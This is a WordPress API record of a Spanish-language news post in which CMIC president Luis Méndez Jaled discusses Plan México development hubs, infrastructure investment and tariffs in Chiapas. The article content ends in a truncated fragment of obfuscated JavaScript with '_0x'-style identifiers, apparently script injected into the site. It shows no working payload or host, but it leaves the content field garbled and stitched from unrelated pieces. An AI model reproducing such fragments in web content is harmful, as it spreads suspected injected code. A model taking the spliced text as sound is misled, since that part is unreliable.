{"id":21739,"date":"2025-05-05T04:13:29","date_gmt":"2025-05-05T04:13:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21739"},"modified":"2025-05-05T04:13:30","modified_gmt":"2025-05-05T04:13:30","slug":"cmic-se-prepara-para-impulsar-los-polos-de-desarrollo-y-la-obra-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21739","title":{"rendered":"CMIC se prepara para impulsar los polos de desarrollo y la obra p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250504-WA0016-1024x765.jpg\" alt=\"\" class=\"wp-image-21740\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250504-WA0016-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250504-WA0016-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250504-WA0016-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250504-WA0016-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250504-WA0016.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>4 de mayo del 2025.Este fin de semana, Luis M\u00e9ndez Jaled presidente nacional de la C\u00e1mara Mexicana de la Industria de la Construcci\u00f3n (CMIC) dio a conocer durante su visita a la entidad que en conjunto con la delegaci\u00f3n Chiapas se construye y reactiva la propuesta de trabajo de la c\u00e1mara.<\/p>\n\n\n\n<p>Acompa\u00f1ado del presidente estatal Rogelio Tamayo Carboney, destac\u00f3 el trabajo realizado en la novena edici\u00f3n de la \u201cExpoferia del Constructor que se efectu\u00f3 los d\u00edas 1 y 2 de mayo.<\/p>\n\n\n\n<p>En conferencia de prensa dio a conocer que, con el planteamiento de programas federales \u201cel Plan M\u00e9xico habla de fortalecer dentro de sus polos de cesarlo al Sur del Pa\u00eds con mucho \u00e9nfasis en la continuidad de varias obras que se ten\u00edan desde el sexenio pasado\u201d.<\/p>\n\n\n\n<p>Destac\u00f3 que para impulsar estos polos de desarrollo se contempla el desarrollo de capital humano, la provedur\u00eda \u201ccreo que los proyectos de la L\u00ednea K, el tema del Trans\u00edsmico, toda esta regi\u00f3n los va poner en un radar m\u00e1s interesante as\u00ed como la infraestructura log\u00edstica con el tema de los puertos, aeropuertos, caminos, la infraestructura h\u00eddrica y la energ\u00eda\u201d.<\/p>\n\n\n\n<p>Dijo que la para este sexenio se tiene una visi\u00f3n m\u00e1s equilibrada del pa\u00eds.<\/p>\n\n\n\n<p>En un contexto econ\u00f3mico internacional adverso, manifest\u00f3 que, el tema de la infraestructura como derecho humano y como una esencia para la competitividad ha transitado por episodios de bonanza y complejos.<\/p>\n\n\n\n<p>\u201cHoy en d\u00eda, hay un presupuesto irreductible en temas de programas sociales, en temas de otro tipo de desarrollo que voltea a ver a la infraestructura con un enfoque donde debamos invertir en este tipo de asociaciones mixtas, con inversiones p\u00fablicas y privadas\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Para ello dijo que, es de suma importancia que exista certeza tanto en estado de derecho como en lo financiero y M\u00e9xico en estos momentos cuenta con una econom\u00eda estable, con un peso fuerte.<\/p>\n\n\n\n<p>\u201cLos aranceles generan incertidumbre, las inversiones no llegan como nosotros quisi\u00e9ramos, sin embargo, la presidenta ha hecho un extraordinario trabajo con este tema en el que ha pugnado por un trato respetuoso hacia M\u00e9xico\u201d, subray\u00f3.<\/p>\n\n\n\n<p>Por ello destac\u00f3 la importancia de trabajar en conjunto para afrontar este d\u00e9ficit que se tiene estimado en un 2.7% del Producto Interno Bruto para que los sectores se vean afectados lo menos posible.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 4 de mayo del 2025.Este fin de semana, Luis M\u00e9ndez Jaled presidente nacional de la C\u00e1mara Mexicana de la Industria de la Construcci\u00f3n (CMIC) dio a conocer durante su visita a la entidad que en conjunto con la delegaci\u00f3n Chiapas se construye y reactiva la propuesta de trabajo de la c\u00e1mara. Acompa\u00f1ado del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21740,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21739","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21739","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21739"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21739\/revisions"}],"predecessor-version":[{"id":21741,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21739\/revisions\/21741"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21740"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21739"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21739"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21739"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}